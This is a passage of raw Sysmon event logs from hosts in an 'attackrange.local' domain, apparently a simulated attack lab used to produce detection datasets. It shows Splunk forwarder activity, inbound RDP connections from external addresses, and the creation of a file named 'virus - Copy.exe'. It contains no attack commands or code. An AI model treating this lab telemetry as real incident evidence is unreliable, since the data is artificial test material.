Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047226Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:53.444{466BC892-F3A9-60EB-0A7D-00000000CF01}8804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047225Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:53.428{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8884BB4861ACEEDEC32C24D9FD4B9D8,SHA256=452ECA0ABE16776733A3AC0D41443753E5EC36680865E508CDC0B58AEF15D19F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806767Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:53.253{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55562CCC3D4E56017E2E2A48E537F237,SHA256=C7005E00A853A2C8952B441E00B7F11785D020F637565EFCC1B6173AB3BE2991,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047224Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:53.097{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8F930C7805F529F26B3C22A7ED6DC677,SHA256=771EBADE831C6E0D26DDA0FA0866E7D26C001DD7D18974A3BCF88F9E9A661EB2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047245Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:46.659{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-50097-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001047244Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:54.429{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BBF00ED5D9C0E7421CC9E693860FFC53,SHA256=EC48BC676177FCE7A128A00AE250348DEC749F2E8796D3BF10F1569F7FBCDFC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806768Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:54.287{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9C1729BC593C1D23CD3B11D3607B532,SHA256=9626E2EC2D02D4E8BCA447DB50773E2ACC44B67603FF3F2C4C8C05ED756704D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047243Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:54.382{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EC9C5D281074D7CECDFFC7476769EEDE,SHA256=F0BFA9FC8B3A661644B04BB42A61B0E8E94E1BBDF8E5B451174B52AA3F60B858,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047242Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:54.143{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F3AA-60EB-0B7D-00000000CF01}9504C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047241Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:54.127{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047240Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:54.127{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047239Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:54.127{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047238Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:54.127{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047237Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:54.127{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F3AA-60EB-0B7D-00000000CF01}9504C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047236Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:54.127{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F3AA-60EB-0B7D-00000000CF01}9504C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047235Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:54.128{466BC892-F3AA-60EB-0B7D-00000000CF01}9504C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047246Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:55.442{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E14315ED6CAE27553C5CAC919398F35,SHA256=6A1364343805C2BC9F47E00406E5386A8596D7DFC1830A5765C3D3F7FE06C73C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806769Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:55.287{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=702B55380026247A6541A101DD323EB4,SHA256=4F187064CDD1AF02891441958BF5D88A5DCF1C8467DDA617EF7470367D3006BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047249Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:56.842{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047248Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:48.732{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50959-false10.0.1.12-8000- 23542300x80000000000000001047247Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:56.460{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55C1FFBDF73521CCC9480642E3DD81CF,SHA256=555C3276E6ED49A0E127D00C3BA0951505A9B94B734340FD1C9D36E19A0912A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806770Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:56.334{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C7F422D177E7C093DC8CD422A97CAF5,SHA256=2EE41D615C975A321CBCE60E283AA60DBB6FC597D1FE6F5E59B4423700A84F56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047251Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:57.994{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\sd1.ps1@2021-07-12_074750MD5=9C23E0F56B84EE9709000172EC5E6F3F,SHA256=CE019FECC2D05EB84CD552E654AD6C83D6E142EEC43A7B5CC27BCFDA8DC8CA6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047250Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:57.479{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC0B8763740CF39A5A0CB95479D03E65,SHA256=240EBE0E67DDB0587DF58636655C4975F29F9359101E22E149FFCDCC2F212BAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806772Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:57.334{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73BBDCDC77430C1C09EAC87CD45F8B9D,SHA256=6A2E2BD90FCE7BE2035497BB2BC3EB973BC6FFAE052F15DDB0E0841A857CBA5F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806771Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:55.295{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57207-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001047254Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.378{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50960-false10.0.1.12-8089- 23542300x80000000000000001047253Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:58.493{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6DA28F84768BF0E580DADE364202B02,SHA256=5262691E7134C7CB3B3EAB6493B2DC2DAE293A26A4F9D7829E4545F1B663A638,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806773Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:58.334{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3916BD0BFC9B9843E50473255CA363EB,SHA256=FDC8C4CBC90D9493443D85CFB75EAAF9495A1DE0DB14DE955CA3BAD2CDAAC0E0,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001047252Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localEXE2021-07-12 07:47:58.225{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Temp\test\virus - Copy.exe2021-07-12 07:47:58.225 23542300x80000000000000001047255Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:59.508{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0D6E7020D2D790FD19829176E7A5664,SHA256=ACE3EB042AB77FA66FD65D1C0E9AD1AD5363A5BD6B3F1B5AE1FC0A90FD4A25D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806774Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:59.350{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69B2F595C8C032773E373221FAD3D5CA,SHA256=537EC611A666881A7A7CF262B6E5A0F77F05DAB0C884D24568BA814888B499EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047256Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:00.522{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B9E9B77AC432598B695A5FB55C77E3A,SHA256=1A21B270FF648B607D9B4CA0DFEF5C8903A76865B547DA23DAFAD423B7058431,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806775Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:00.350{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E5BEBCCC413CBADED8970EE7827E0A6,SHA256=C77BC474E7F4374AA0AF537BF8CE548D92A94103D4065D8373EE049F1E435490,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047257Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:01.537{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F43066DDC41577799FBBACE42BD2EBD8,SHA256=5B12B157EAC7CB38F9443AA59A84B580A0BC201EF24C9A41CF3BE145CCAE388E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806776Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:01.350{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AE630666EC5791902E29E6A70B40CA7,SHA256=EBBC2156276416D3B6E73DFC449AABF86A90BD9F07849EE1DD0EC1DE438BD4B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806777Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:02.365{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BB46FFCEB6D76D0543E04377BF15AB3,SHA256=C2C1405B315C2C9E6BB63EABFC199573C9AE3EB197CB9B1CCB4453481987123E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047258Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:02.537{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=593B07DA7ED1C3F01756AF13C101BD1A,SHA256=2F4D6E3E94057690D9D42D2E59033C24A5CB8D12B6E1D5A5A03730309A93F140,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806779Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:03.381{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8E550CB0BA122413BF9A037B4C6447B,SHA256=962401C0175F317E7ADD84D318F5FAE1CCD657E3E25AA332B75E3EF913578D9F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047268Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:55.474{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse62.80.172.54-51147-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 10341000x80000000000000001047267Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:03.689{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047266Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:03.689{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047265Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:03.689{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047264Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 